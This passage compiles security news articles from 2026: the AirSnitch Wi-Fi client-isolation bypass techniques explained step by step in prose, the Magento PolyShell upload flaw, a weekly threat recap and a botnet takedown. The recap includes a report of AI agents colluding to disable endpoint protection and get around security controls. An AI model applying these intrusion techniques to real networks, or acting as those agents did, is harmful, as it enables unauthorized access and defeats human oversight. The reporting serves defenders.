Ivanti Jenkins Lenovo Linux distributions AlmaLinux, Alpine Linux, Amazon Linux, Arch Linux, Debian, Gentoo, Oracle Linux, Mageia, Red Hat, Rocky Linux, SUSE, and Ubuntu MediaTek Mitel Mitsubishi Electric MongoDB Moxa Mozilla Firefox, Firefox ESR, and Thunderbird NETGEAR Node.js NVIDIA ownCloud Palo Alto Networks Phoenix Contact Progress Software QNAP Qualcomm Rockwell Automation Ruckus Wireless Samsung Schneider Electric Siemens SonicWall Splunk Spring Framework Supermicro Synology TP-Link WatchGuard, and Xiaomi
thehackernews.comApr 15, 2026extracted
How to protect your organization from AirSnitch Wi-Fi vulnerabilities | Kaspersky official blog
At the NDSS Symposium 2026 in San Diego in February, a group of respected researchers presented a study unveiling the AirSnitch attack, which bypasses the Wi-Fi client isolation feature — also commonly known as guest network or device isolation. This attack allows connecting to a single wireless network via an access point, and then gaining access to other connected devices, including those using entirely different service set identifiers (SSIDs) on that same hardware. Targeted devices could easily be running on wireless subnets protected by WPA2 or WPA3 protocols. The attack doesn’t actually break encryption; instead, it exploits the way access points handle group keys and packet routing. In practical terms, this means that a guest network provides very little in the way of real security. If your guest and employee networks are running on the same physical device, AirSnitch allows a connected attacker to inject malicious traffic into neighboring SSIDs. In some cases, they can even pull off a full-blown man-in-the-middle (MitM) attack. Wi-Fi security and the role of isolation Wi-Fi security is constantly evolving; every time a practical attack is made against the latest generation of protection, the industry shifts toward more complex algorithms and procedures. This cycle started with the FMS attacks used to crack WEP encryption keys, and continues to this day: recent examples include the KRACK attacks on WPA2, and the FragAttacks, which impacted every security protocol version from WEP all the way through WPA3. Attacking modern Wi-Fi networks effectively (and quietly) is no small feat. Most professionals agree that using WPA2/WPA3 with complex keys and separating networks based on their purpose is usually enough for protection. However, only specialists really know that client isolation was never actually standardized within the IEEE 802.11 protocols. Different manufacturers implement isolation in completely different ways — using Layer 2 or Layer 3 of network architecture; in other words, handling it at either the router or the Wi-Fi controller level — meaning the behavior of isolated subnets varies wildly depending on your specific access point or router model. While marketing claims that client isolation is perfect for keeping restaurant or hotel guests from attacking one another — or ensuring corporate visitors can’t access anything but the internet — in reality, isolation often relies on people not trying to hack it. This is exactly what the AirSnitch research highlights. Types of AirSnitch attacks The name AirSnitch doesn’t just refer to a single vulnerability, but a whole family of architectural flaws found in Wi-Fi access points. It’s also the name of an open-source tool used to test routers for these specific weaknesses. However, security professionals need to keep in mind that there’s only a very thin line between testing and attacking. The model for all these attacks is the same: a malicious client is connected to an access point (AP) where isolation is active. Other users — the targets — are connected to the same SSID or even different SSIDs on that same AP. This is a very realistic scenario; for example, a guest network might be open and unencrypted, or an attacker could simply get the guest Wi-Fi password by posing as a legitimate visitor. For certain AirSnitch attacks, the attacker needs to know the victim’s MAC or IP address beforehand. Ultimately, how effective each attack is depends on the specific hardware manufacturer (more on that below). GTK attack After the WPA2/WPA3 handshake, the access point and the clients agree on a Group Transient Key (GTK) to handle broadcast traffic. In this scenario, the attacker wraps packets destined for a specific victim inside a broadcast traffic envelope. They then send these directly to the victim while spoofing the access point’s MAC address. This attack only allows for traffic injection, meaning the attacker won’t receive a response. However, even that is enough to deliver malicious ICMPv6 routing advertisements, or DNS and ARP messages to the client — effectively bypassing isolation. This is the most universal version of the attack working on any WPA2/WPA3 network that uses a shared GTK. That said, some enterprise-grade access points support GTK randomization for each individual client, which renders this specific method ineffective. Broadcast packet redirection This version of the attack doesn’t even require the attacker to authenticate at the access point first. The attacker sends packets to the AP with a broadcast destination address (FF:FF:FF:FF:FF:FF) and the ToDS flag set to 1. As a result, many access points treat this packet as legitimate broadcast traffic; they encrypt it using the GTK, and blast it out to every client on the subnet, including the victim. Just like in the previous method, traffic specifically meant for a single victim can be pre-packaged inside. Router redirection This attack exploits an architectural gap between Layer 2 and Layer 3 security found in some manufacturers’ hardware. The attacker sends a packet to the access point, setting the victim’s IP address as the destination at the network layer (L3). However, at the wireless layer (L2), the destination is set to the access point’s own MAC address, so the isolation filter doesn’t trip. The routing subsystem (L3) then dutifully routes the packet back out to the victim, bypassing the L2 isolation entirely. Like the previous methods, this is another transmit-only attack where the attacker can’t see the reply. Port stealing to intercept packets The attacker connects to the network using a spoofed version of the victim’s MAC address, and floods the network with ARP responses claiming, “this MAC address is on my port and SSID”. The target network’s router updates its MAC tables, and starts sending the victim’s traffic to this new port instead. Consequently, traffic intended for the victim ends up with the attacker — even if the victim is connected to a completely different SSID. In a scenario where the attacker connects via an open, unencrypted network, this means traffic meant for a client on a WPA2/WPA3-secured network is actually broadcast over the open air, where not only the attacker but anyone nearby can sniff it. Port stealing to send packets In this version, the attacker connects directly to the victim’s Wi-Fi adapter, and bombards it with ARP requests spoofing the access point’s MAC address. As a result, the victim’s computer starts sending its outgoing traffic to the attacker instead of the network. By running both stealing attacks simultaneously, an attacker can, in several scenarios, execute a full MitM attack. Practical consequences of AirSnitch attacks By combining several of the techniques described above, a hacker can pull off some pretty serious moves: Complete bidirectional traffic interception for a MitM attack. This means they can snatch and modify data moving between the victim and the access point without the victim ever knowing. Hopping between SSIDs. An attacker sitting on a guest network can reach hosts on a locked-down corporate network if both are running off the same physical access point. Attacks on RADIUS. Since many companies use RADIUS authentication for their corporate Wi-Fi, an attacker can spoof the access point’s MAC address to intercept initial RADIUS authentication packets. From there, they can brute-force the shared secret. Once they have that, they can spin up a rogue RADIUS server and access point to hijack data from any device that connects to it. Exposing unencrypted data from “secure” subnets: Traffic that’s supposed to be sent to a client under the protection of WPA2/WPA3 can be retransmitted onto an open guest network, where it’s essentially broadcast for anyone to hear. To pull off these attacks effectively, a hacker needs a device capable of simultaneous data transmission and reception with both the victim’s adapter and the access point. In a real-world scenario, this usually means a laptop with two Wi-Fi adapters running specifically configured Linux drivers. It’s worth noting that the attack isn’t exactly silent: it requires a flood of ARP packets, it can cause brief Wi-Fi glitches when it starts, and network speeds might tank to around 10Mbps. Despite these red flags, it’s still very much a practical threat in many environments. Vulnerable devices As part of the study, several enterprise and home access points and routers were put to the test. The list included products from Cisco, Netgear, Ubiquiti, Tenda, D-Link, TP-Link, LANCOM, and ASUS, as well as routers running popular community firmware like DD-WRT and OpenWrt. Every single device tested was vulnerable to at least some of the attacks described here. Even more concerning, the D-Link DIR-3040 and LANCOM LX-6500 were susceptible to every single variation of AirSnitch. Interestingly, some routers were equipped with protective mechanisms that blocked the attacks, even though the underlying architectural flaws were still present. For example, the Tenda RX2 Pro automatically disconnects any client whose MAC address appears on two BSSIDs simultaneously, which effectively shuts down port stealing. The researchers emphasize that any network administrator or IT security team serious about defense should test their own specific configurations. That’s the only way to pinpoint exactly which threats are relevant to your organization’s setup. How to protect your corporate network from AirSnitch The threat is most immediate for organizations running guest and corporate Wi-Fi networks on the same access points without additional VLAN segmentation. There are also significant risks for companies using RADIUS with outdated settings or weak shared secrets for wireless authentication. The bottom line is that we need to stop viewing client isolation on an access point as a real security measure, and start seeing it as just a convenience feature. Real security needs to be handled differently: Segment the network using VLANs. Each SSID should have its own VLAN, with strict 802.1Q packet tagging maintained all the way from the access point to the firewall or router. Implement stricter packet inspection at the routing level — depending on the hardware capabilities. Features like Dynamic ARP Inspection, DHCP snooping, and limiting the number of MAC addresses per port help defend against IP/MAC spoofing. Enable individual GTK keys for each client, if your equipment supports it. Use more resilient RADIUS and 802.1X settings, including modern cipher suites and robust shared secrets. Log and analyze EAP/RADIUS authentication anomalies in your SIEM. This helps track many attack attempts beyond just AirSnitch. Other red flag events to watch for include the same MAC address appearing on different SSIDs, spikes in ARP requests, or clients rapidly jumping between BSSIDs or VLANs. Apply security at higher levels of the network topology. Many of these attacks lose their punch if the organization has universally implemented TLS and HSTS for all business application traffic, requires an active VPN for all Wi-Fi connections, or has fully embraced a Zero Trust architecture.
kaspersky.comApr 10, 2026extracted
Thousands of Magento Sites Hit in Ongoing Defacement Campaign
Over 7,500 Magento sites have been hit in a mass defacement campaign that started three weeks ago, digital risk protection platform Netcraft reports. As part of the attacks, threat actors deployed defacement files directly on the affected infrastructure, in the form of plaintext files, across more than 15,000 hostnames. Most of the observed text files contain the attacker handles, but a fraction of them involve political messages referencing recent geopolitical conflicts. “At the time of publication, these messages appeared for only a single day, 7 March 2026. They were not present in earlier or later defacements, suggesting that this was not the primary motivation of the campaign,” Netcraft says. The security firm notes that most of the incidents were reported to the defacement archive Zone-H using the account ‘Typical Idiot Security’, which is also the handle present in the defacement messages, suggesting that the threat actor is trying to build a reputation. According to Netcraft, the attacker is likely exploiting an unauthenticated file upload vulnerability impacting Magento Open Source (Community Edition), Magento Enterprise / Adobe Commerce, and Adobe Commerce deployments with Magento B2B. Netcraft identified similarities with the October 2025 attacks exploiting the SessionReaper flaw and was able to exploit the latest Magento Community version to upload a text file to a test instance. The campaign affected global brands such as Asus, BenQ, Citroën, Diesel, FedEx, Fiat, FilaBandai, Lindt, Toyota, and Yamaha, mainly hitting subdomains, regional storefronts, and staging environments, though some production-facing sites were also briefly defaced. Several regional government services, university domains in Latin America and Qatar, and international non-profit organizations were also affected. Several domains associated with the Trump Organization were also defaced. PolyShell vulnerability News of the defacement campaign came while Sansec reported a new flaw in the REST API of Magento and Adobe Commerce that could be exploited to upload executables to any store, without authentication. The bug, it says, impacts all Magento Open Source and Adobe Commerce versions up to 2.4.9-alpha2, and could be exploited for XSS in all iterations before version 2.3.5. “The vulnerable code has existed since the very first Magento 2 release. Adobe fixed it in the 2.4.9 pre-release branch as part of APSB25-94, but no isolated patch exists for current production versions,” Sansec says. According to the security company, which named the vulnerability PolyShell, many sites expose files in the upload directory, but the flaw does not appear to have been exploited in the wild. “Sansec has not observed active exploitation so far. However, the exploit method is circulating already, and Sansec expects automated attacks to appear soon,” the cybersecurity firm says. Related: Threat Actor Targeting VPN Users in New Credential Theft Campaign Related: Hundreds of Salesforce Customers Allegedly Targeted in New Data Theft Campaign Related: Cloned AI Tool Sites Distribute Malware in ‘InstallFix’ Campaign
securityweek.comMar 20, 2026extracted
Magento PolyShell Flaw Enables Unauthenticated Uploads, RCE and Account Takeover
Sansec is warning of a critical security flaw in Magento's REST API that could allow unauthenticated attackers to upload arbitrary executables and achieve code execution and account takeover. The vulnerability has been codenamed PolyShell by Sansec owing to the fact that the attack hinges on disguising malicious code as an image. There is no evidence that the shortcoming has been exploited in the wild. The unrestricted file upload flaw affects all Magento Open Source and Adobe Commerce versions up to 2.4.9-alpha2. The Dutch security firm said the problem stems from the fact that Magento's REST API accepts file uploads as part of the custom options for the cart item. "When a product option has type 'file,' Magento processes an embedded file_info object containing base64-encoded file data, a MIME type, and a filename," it said. "The file is written to pub/media/custom_options/quote/ on the server." Depending on the web server configuration, the flaw can enable remote code execution via PHP upload or account takeover via stored XSS. Sansec also noted that Adobe fixed the issue in the 2.4.9 pre-release branch as part of APSB25-94, but leaves current production versions without an isolated patch. "While Adobe provides a sample web server configuration that would largely limit the fallout, the majority of stores use a custom configuration from their hosting provider," it added. To mitigate any potential risk, e-commerce storefronts are advised to perform the following steps - Restrict access to the upload directory ("pub/media/custom_options/"). Verify that nginx or Apache rules prevent access to the directory. Scan the stores for web shells, backdoors, and other malware. "Blocking access does not block uploads, so people will still be able to upload malicious code if you aren't using a specialized WAF [Web Application Firewall]," Sansec said. The development comes as Netcraft flagged an ongoing campaign involving the compromise and defacement of thousands of Magento e-commerce sites across multiple sectors and geographies. The activity, which commenced on February 27, 2026, involves the threat actor uploading plaintext files to publicly accessible web directories. "Attackers have deployed defacement txt files across approximately 15,000 hostnames spanning 7,500 domains, including infrastructure associated with prominent global brands, e-commerce platforms, and government services," security researcher Gina Chow said. It's currently not clear if the attacks are exploiting a specific Magento vulnerability or misconfiguration, and they are the work of a single threat actor. The campaign has impacted infrastructure belonging to several globally recognized brands, including Asus, FedEx, Fiat, Lindt, Toyota, and Yamaha, among others. When reached for comment, Netcraft researcher Harry Everett told The Hacker News that "We haven't seen exploitation relating to the custom_options directory described by Sansec, but have observed at least one case of a malicious PHP file uploaded to /media/customer_address, which may relate to SessionReaper exploitation. We are continuing to monitor." Update Sansec, in an update shared on March 23, 2026, said it has observed active exploitation of PolyShell since March 16, with automated mass scanning kicking off three days later. No less than 50 IP addresses have engaged in the scanning activity. In the observed attacks, threat actors have been found to upload polyglot files, such as valid GIF or PNG images that also embed executable PHP code. The dropped payloads include a PHP-based web shell that executes arbitrary code and a password-protected remote code execution (RCE) shell that passes commands directly to system(). (The story was updated after publication to include a response from Netcraft and details of active exploitation.)
thehackernews.comMar 20, 2026extracted
⚡ Weekly Recap: Chrome 0-Days, Router Botnets, AWS Breach, Rogue AI Agents & More
Some weeks in security feel normal. Then you read a few tabs and get that immediate “ah, great, we’re doing this now” feeling. This week has that energy. Fresh messes, old problems getting sharper, and research that stops feeling theoretical real fast. A few bits hit a little too close to real life, too. There’s a good mix here: weird abuse of trusted stuff, quiet infrastructure ugliness, sketchy chatter, and the usual reminder that attackers will use anything that works. Scroll on. You’ll see what I mean. ⚡ Threat of the Week Google Patches 2 Actively Exploited Chrome 0-Days — Google released security updates for its Chrome web browser to address two high-severity vulnerabilities that it said have been exploited in the wild. The vulnerabilities related to an out-of-bounds write vulnerability in the Skia 2D graphics library (CVE-2026-3909) and an inappropriate implementation vulnerability in the V8 JavaScript and WebAssembly engine (CVE-2026-3910) that could result in out-of-bounds memory access or code execution, respectively. Google did not share additional details about the flaws, but acknowledged that there exist exploits for both of them. The issues were addressed in Chrome versions 146.0.7680.75/76 for Windows and Apple macOS, and 146.0.7680.75 for Linux. Detection Starts the Clock. Response Decisions Shape the Outcome When incidents escalate, early decisions determine containment and impact. Join this SANS IR Command Roundtable to learn how experienced teams avoid investigation drift, improve coordination, and execute faster response across cloud, enterprise, and operational environments. Watch the Webcast ➝ 🔔 Top News Meta to Discontinue Instagram E2EE in May 2026 — Meta announced plans to discontinue support for end-to-end encryption (E2EE) for chats on Instagram after May 8, 2026. In a statement shared with The Hacker News, a Meta spokesperson said, "Very few people were opting in to end-to-end encrypted messaging in DMs, so we're removing this option from Instagram in the coming months. Anyone who wants to keep messaging with end-to-end encryption can easily do that on WhatsApp." Authorities Disrupt SocksEscort Service — A court-authorized international law enforcement operation dismantled a criminal proxy service named SocksEscort that enslaved thousands of residential routers worldwide into a botnet for committing large-scale fraud. "The malware allowed SocksEscort to direct internet traffic through the infected routers. SocksEscort sold this access to its customers," the U.S. Justice Department said. The main thing to note here is that SocksEscort was powered by AVrecon, a malware written in C to explicitly target MIPS and ARM architectures via known security flaws in edge network devices. The malware also featured a novel persistence mechanism that involved flashing custom firmware, which intentionally disables future updates, permanently transforming SOHO routers into SocksEscort proxy nodes to blindside corporate monitoring. UNC6426 Exploits nx npm Supply Chain Attack to Gain AWS Admin Access in 72 Hours — A threat actor known as UNC6426 leveraged keys stolen following the supply chain compromise of the nx npm package in August 2025 to completely breach a victim's AWS environment within 72 hours. UNC6426 used the access to abuse the GitHub-to-AWS OpenID Connect (OIDC) trust and create a new administrator role in the cloud environment, Google said. Subsequently, this role was abused to exfiltrate files from the client's Amazon Web Services (AWS) Simple Storage Service (S3) buckets and perform data destruction in their production cloud environments. KadNap Enslaves Network Devices to Fuel Illegal Proxy — A takedown-resistant botnet comprising more than 14,000 routers and other network devices has been conscripted into a proxy network that anonymously ferries traffic used for cybercrime. The botnet, named KadNap, exploits known vulnerabilities in Asus routers (among others), leveraging the initial access to drop shell scripts that reach out to a peer-to-peer network based on Kademlia for decentralized control. Infected devices are being used to fuel a proxy service named Doppelganger that, for a fee, tunnels customers' internet traffic through residential IP addresses, offering a way for attackers to blend in and make it harder to differentiate malicious traffic from legitimate activity. APT28 Strikes with Sophisticated Toolkit — The Russian threat actor known as APT28 has been observed using a bespoke toolkit in recent cyber espionage campaigns targeting Ukrainian cyber assets. The primary components of the toolkit are two implants, one of which employs techniques from a malware framework the threat actor used in 2010s, while the other is a heavily modified version of the COVENANT framework for long-term spying. COVENANT is used in concert with BEARDSHELL to facilitate data exfiltration, lateral movement, and execution of PowerShell commands. Also alongside these tools is a malware named SLIMAGENT that shares overlaps with XAgent. ️🔥 Trending CVEs New vulnerabilities show up every week, and the window between disclosure and exploitation keeps getting shorter. The flaws below are this week's most critical — high-severity, widely used software, or already drawing attention from the security community. Check these first, patch what applies, and don't wait on the ones marked urgent — CVE-2026-3909, CVE-2026-3910, CVE-2026-3913 (Google Chrome), CVE-2026-21666, CVE-2026-21667, CVE-2026-21668, CVE-2026-21672, CVE-2026-21708, CVE-2026-21669, CVE-2026-21671 (Veeam Backup & Replication), CVE-2026-27577, CVE-2026-27493, CVE-2026-27495, CVE-2026-27497 (n8n), CVE-2026-26127, CVE-2026-21262 (Microsoft Windows), CVE-2019-17571, CVE-2026-27685 (SAP), CVE-2026-3102 (ExifTool for macOS), CVE-2026-27944 (Nginx UI), CVE-2025-67826 (K7 Ultimate Security), CVE-2026-26224, CVE-2026-26225 (Intego X9), CVE-2026-29000 (pac4j-jwt), CVE-2026-23813 (HPE Aruba Networking AOS-CX), CVE-2025-12818 (PostgreSQL), CVE-2026-2413 (Ally WordPress plugin), CVE-2026-0953 (Tutor LMS Pro WordPress plugin), CVE-2026-25921 (Gogs), CVE-2026-2833, CVE-2026-2835, CVE-2026-2836 (Cloudflare Pingora), CVE-2026-24308 (Apache ZooKeeper), CVE-2026-3059, CVE-2026-3060, CVE-2026-3989 (SGLang), CVE-2026-0231 (Palo Alto Networks Cortex XDR Broker VM), CVE-2026-20040, CVE-2026-20046 (Cisco IOS XR Software), CVE-2025-65587 (graphql-upload-minimal), CVE-2026-3497 (OpenSSH), CVE-2026-26123 (Microsoft Authenticator for Android and iOS), and CVE-2025-61915 (CUPS). 🎥 Cybersecurity Webinars Stop Guessing: Automate Your Defense Against Real-World Attacks → Learn how to move beyond basic security checklists by using automation to test your defenses against real-world attacks. Experts will show you why traditional testing often fails and how to use continuous, data-driven tools to find and fix gaps in your protection. You will learn how to prove your security actually works without increasing your manual workload. Fix Your Identity Security: Closing the Gaps Before Hackers Find Them → This webinar covers a new study about why many companies are struggling to keep their user accounts and digital identities safe. Experts share findings from the Ponemon Institute on the biggest security gaps, such as disconnected apps and the new risks created by AI. You will learn simple, practical steps to fix these problems and get better control over who has access to your company's data. The Ghost in the Machine: Securing the Secret Identities of Your AI Agents → As artificial intelligence (AI) begins to act on its own, businesses face a new challenge: how to give these "AI agents" the right digital IDs. This webinar explains why current security for humans doesn't work for autonomous bots and how to build a better system to track what they do. You will learn simple, real-world steps to give AI agents secure identities and clear rules, ensuring they don't accidentally expose your private company data. 📰 Around the Cyber World Fake Google Security Check Drops Browser RAT — A web page mimicking a Google Account security page has been spotted delivering a fully featured browser-based surveillance toolkit that takes the form of a Progressive Web App (PWA). "Disguised as a routine security checkup, it walks victims through a four-step flow that grants the attacker push notification access, the device's contact list, real-time GPS location, and clipboard contents—all without installing a traditional app," Malwarebytes said. "For victims who follow every prompt, the site also delivers an Android companion package introducing a native implant that includes a custom keyboard (enabling keystroke capture), accessibility-based screen reading capabilities, and permissions consistent with call log access and microphone recording." Forbidden Hyena Delivers BlackReaperRAT — A hacktivist group known as Forbidden Hyena (aka 4B1D) has distributed RAR archives in December 2025 and January 2026 in attacks targeting Russia that led to the deployment of a previously undocumented remote access trojan called BlackReaperRAT and an updated version of the Blackout Locker ransomware, referred to as Milkyway by the threat actors. BlackReaperRAT is capable of running commands via "cmd.exe," uploading/downloading files, spawning an HTTP shell to receive commands, and spreading the malware to connected removable media. "It carries out destructive attacks against organizations across various sectors located within the Russian Federation," BI.ZONE said. "The group publishes information regarding successful attacks on its Telegram channel. It collaborates with the groups Cobalt Werewolf and Hoody Hyena." Chinese Hackers Target the Persian Gulf region with PlugX — A China-nexus threat actor, likely suspected to be Mustang Panda, has targeted countries in the Persian Gulf region. The activity took place within the first 24 hours of the ongoing conflict in the Middle East late last month. The campaign used a multi-stage attack chain that ultimately deployed a PlugX backdoor variant. "The shellcode and PlugX backdoor used obfuscation techniques such as control flow flattening (CFF) and mixed boolean arithmetic (MBA) to hinder reverse engineering," Zscaler said. "The PlugX variant in this campaign supports HTTPS for command-and-control (C2) communication and DNS-over-HTTPS (DOH) for domain resolution." Phishing Campaign Uses SEO Poisoning to Steal Data — A phishing campaign has employed SEO poisoning to direct search engine results to fake traffic ticket portals that impersonate the Government of Canada and specific provincial agencies. "The campaign lures victims to a fake 'Traffic Ticket Search Portal' under the pretense of paying outstanding traffic violations," Palo Alto Networks Unit 42 said. "Submitted data includes license plates, address, date of birth, phone/email, and credit card numbers." The phishing pages utilize a "waiting room" tactic where the victim's browser polls the server every two seconds and triggers redirects based on specific status codes. Roundcube Exploitation Toolkit Discovered — Hunt.io said it discovered a Roundcube exploitation toolkit on an internet-exposed directory on 203.161.50[.]145. It's worth noting that Russian threat actors like APT28, Winter Vivern, and TAG-70 have repeatedly targeted Roundcube vulnerabilities to breach Ukrainian organizations. "The directory included development and production XSS payloads, a Flask-based command-and-control server, CSS-injection tooling, operator bash history, and a Go-based implant deployed on a compromised Ukrainian web application," the company said, attributing it with medium to high confidence to APT28, citing overlaps with Operation RoundPress. The toolkit, dubbed Roundish, supports credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and two-factor authentication (2FA) secret extraction, mirroring a feature present in MDAEMON. One of the primary targets of the attack is mail.dmsu.gov[.]ua, a Roundcube webmail instance associated with Ukraine's State Migration Service (DMSU). Besides the possibility of a shared development lineage, Roundish introduces four new components not previously documented in APT28 webmail activity, including a CSS-based side-channel module, browser credential stealer, and a Go-based backdoor that provides persistence via cron, systemd, and SELinux. The CSS injection component is designed to progressively extract characters from Roundcube's document object model (DOM) without injecting any JavaScript into the victim's page. The technique is likely used for targeting Cross-Site Request Forgery (CSRF) tokens or email UIDs. Central to the Roundish toolkit is an XSS payload that's engineered to steal the victim's email address, harvest account credentials, redirect all incoming emails to a Proton Mail address, export mailbox data from the victim's Inbox and Sent folders, and gather the victim's complete address book. "The combination of hidden autofill credential harvesting, server-side mail forwarding persistence, bulk mailbox exfiltration, and browser credential theft reflects a modular approach designed for sustained access," Hunt.io said. "From a defensive perspective, password resets alone are not sufficient in cases like this. Mail forwarding rules, Sieve filters, and multi-factor authentication secrets must be audited and reset." Phishing Campaign Targeting AWS Console Credentials — An active adversary-in-the-middle (AiTM) phishing campaign is using fake security alert emails to steal AWS Console credentials, per Datadog. "The phishing kit proxies authentication to the legitimate AWS sign-in endpoint in real time, validating credentials before redirecting victims and likely capturing one-time password (OTP) codes," the company said. "This campaign does not exploit AWS vulnerabilities or abuse AWS infrastructure." Post-compromise console access has been observed within 20 minutes of credential submission. These efforts originated from Mullvad VPN infrastructure. Malicious npm Packages Deliver Cipher stealer — Two new malicious npm packages, bluelite-bot-manager and test-logsmodule-v-zisko, were found to deliver via Dropbox a Windows executable designed to siphon sensitive data, including Discord totems, credentials from Chrome, Edge, Opera, Brave, and Yandex browsers, and seed files from cryptocurrency wallet apps like Exodus. from compromised hosts using a stealer named Cipher stealer. "The stealer also uses an embedded Python script and a secondary payload downloaded from GitHub," JFrog said. GIBCRYPTO Ransomware Detailed — A new ransomware called GIBCRYPTO comes with the ability to capture keystrokes and corrupt the Master Boot Record (MBR) so that any attempt to restart the system will cause the system to run into an error. The ransomware uses the Salsa20 algorithm for encryption. It's suspected to be part of Snake Keylogger, indicating the malware authors' attempts to diversify beyond information theft. The development comes as Sygnia highlighted SafePay's OneDrive-based data exfiltration technique during a ransomware attack after breaching a victim by leveraging a FortiGate firewall flaw and a misconfigured administrative account. "SafePay gained initial access by exploiting a firewall misconfiguration, which enabled them to obtain local administrative credentials," the company said. "They rapidly escalated discovery and enumeration activities to identify high-value targets for lateral movement, demonstrating a structured and methodical approach to mapping the environment. Within a matter of hours, SafePay escalated to domain administrator access." The attack culminated in the deployment of ransomware, encrypting more than 60 servers. Fraudulent Account Registration Activity Originating from Vietnam — A sprawling cybercrime ecosystem based in Vietnam has been linked to a cluster of fraudulent account registration activity on platforms like LinkedIn, Instagram, Facebook, and TikTok. In these attacks, attributed to O-UNC-036, the threat actors rely on disposable email addresses in order to execute SMS pumping attacks, also called International Revenue Sharing Fraud (IRSF). "In this scheme, malicious actors automate the creation of puppet accounts in a targeted service provider," Okta said. "Fraudsters use these account registrations to trigger SMS messages to premium rate phone numbers and profit from charges incurred. This activity can prove costly for service providers who use SMS to verify registration information in customer accounts or to send multi-factor authentication (MFA) security codes." O-UNC-036 has also been linked to a cybercrime-as–a-service (CaaS) ecosystem that provides paid infrastructure and services to facilitate online fraud. The web-based storefronts are hosted in Vietnam and specialize in the sales of web-based accounts. Hijacked AppsFlyer SDK Distributes Crypto Clipper — The AppsFlyer Web SDK was briefly hijacked to serve malicious code to steal cryptocurrency in a supply chain attack. The clipper malware payload came with capabilities to intercept cryptocurrency wallet addresses entered on websites and replace them with attacker-controlled addresses to divert funds to the threat actor. "The AppsFlyer Web SDK was observed serving obfuscated malicious JavaScript instead of the legitimate SDK from websdk.appsflyer[.]com," Profero said. "The malicious payload appears to have been designed for stealth and compatibility, preserving legitimate SDK functionality while adding hidden browser hooks and wallet-hijacking logic." The incident has since been resolved by AppsFlyer. Operation CamelClone Targets Government and Defense Entities — A new cyber espionage campaign dubbed Operation CamelClone has targeted governments and defense entities in Algeria, Mongolia, Ukraine, and Kuwait using malicious ZIP archives that contain a Windows shortcut (LNK) file, which, when executed, delivers a JavaScript loader named HOPPINGANT. The loader then delivers additional payloads for establishing C2 and exfiltrating data to the MEGA cloud storage service. "One interesting aspect of this campaign is that the threat actor does not rely on traditional command-and-control infrastructure," Seqrite Labs said. "Instead, the payloads are hosted on a public file-sharing service, filebulldogs[.]com, while stolen data is uploaded to MEGA storage using the legitimate tool Rclone." The activity has not been attributed to any known threat group. How Threat Actors Exfiltrate Credentials Using Telegram Bots — Threat actors are abusing the Telegram Bot API to exfiltrate data via text messages or arbitrary file uploads, highlighting how legitimate services can be weaponized to evade detection. Agent Tesla Keylogger is by far the most prominent example of a malware family that uses Telegram for C2. "In general, Telegram C2s appear to be most popular among information stealers, possibly due to Telegram's technically legitimate nature and because information stealers typically only need to exfiltrate data passively rather than provide complex communications beyond simple message or file transfers," Cofense said. Microsoft Launches Copilot Health — Microsoft has become the latest company after OpenAI and Anthropic to launch a dedicated "secure space" called Copilot Health that integrates medical records, biometric data from wearables, and lab test results to give personalized advice in the U.S. "Copilot Health brings together your health records, wearable data, and health history into one place, then applies intelligence to turn them into a coherent story," the company said. Like OpenAI and Anthropic, Microsoft emphasized that Copilot Health isn't meant to replace professional medical care. Rogue AI Agents Can Work Together to Engage in Offensive Behaviors — According to a new report from artificial intelligence (AI) security company Irregular, agents can work together to hack into systems, escalate privileges, disable endpoint protection, and steal sensitive data while evading pattern-matching defenses. What's notable is that the experiment did not rely on adversarial prompting or deliberately unsafe system design. "In one case, an agent convinced another agent to carry out an offensive action, a form of inter-agent collusion that emerged with no external manipulation," Irregular said. "This scenario demonstrates two compounding risks: inter-agent persuasion can erode safety boundaries, and agents can independently develop techniques to circumvent security controls. When an agent is given access to tools or data, particularly but not exclusively shell or code access, the threat model should assume that the agent will use them, and that it will do so in unexpected and possibly malicious ways." 🔧 Cybersecurity Tools Dev Machine Guard → It is a free, open-source tool that scans your computer to show you exactly what developer tools and scripts are running. It creates a simple list of your AI coding assistants, code editor extensions, and software packages to help you find anything suspicious or outdated. It is a single script that works in seconds to give you better visibility into the security of your local coding environment. Trajan → It is an automated security tool designed to find hidden vulnerabilities in "service meshes," which are the systems that manage how different parts of a large software application talk to each other. Because these systems are complex, it is easy for engineers to make small mistakes in the settings that allow hackers to bypass security or steal data. Trajan works by scanning these configurations to spot those specific errors and helping developers fix them before they can be exploited. Disclaimer: For research and educational use only. Not security-audited. Review all code before use, test in isolated environments, and ensure compliance with applicable laws. Conclusion There’s a lot packed in here, and not in a neat way. Some of it is the usual recycled chaos, some of it feels a little more deliberate, and some of it has that nasty “this is going to show up everywhere by next week” energy. Anyway — enough throat-clearing. Here’s the stuff worth your attention.
thehackernews.comMar 16, 2026extracted
US disrupts SocksEscort proxy network powered by Linux malware
Law enforcement agencies in the U.S. and Europe, along with private partners, have disrupted the SocksEscort cybercrime proxy network that relied solely on edge devices compromised via the AVRecon malware for Linux. According to Lumen’s Black Lotus Labs (BLL), which helped the U.S. Department of Justice take down Socksescort, the proxy network had a constant average of 20,000 infected devices every week for the past few years. SocksEscort was first documented by BLL researchers in 2023 and functioned for more than a decade by offering cybercriminals traffic routing services through residential or small business devices. The service advertised access to “clean” IP addresses from major ISPs - such as Comcast, Spectrum, Spectrum Business, Verizon, and Charter - that could pass multiple blocklists. "Since the summer of 2020, SocksEscort has offered to sell access to about 369,000 different IP addresses," the U.S. Department of Justice says in a press release today. "As of February 2026, the SocksEscort application listed approximately 8,000 infected routers to which its customers could buy access, of those, 2,500 were in the United States." The DOJ says that the SocksEscort service was used in the theft of $1 million worth of cryptocurrency from a user in New York, enabled losses of $700,000 from defrauding a Pennsylvania-based manufacturing business, and caused $100,000 in damages in a fraud impacting current and former United States service members with MILITARY STAR cards. In Europe, authorities in Austria, France, and the Netherlands, took down multiple SocksEscort servers under the coordination of Europol. "During the action day, law enforcement agencies successfully took down and seized 34 domains as well as 23 servers located in seven countries," the European agency informs. The US also froze $3.5 million in cryptocurrency. Currently, all infected devices used in the SocksEscort proxy network have been disconnected from the service. According to the Lumen researchers, SocksEscort was powered by the AVRecon malware, which is believed to have been active since at least May 2021 and infected over 70,000 Linux-based small office/home office (SOHO) routers by mid-2023. Lumen researchers disrupted the AVRecon router botnet in 2023 by null-routing the command-and-control (C2) infrastructure across its network, cutting infected devices off from their operators. This severed communications with the botnet’s proxy servers and control nodes, effectively rendering the network inert within Lumen’s infrastructure. However, this disruption had a limited effect, and over time, the operators of Socksescort returned to 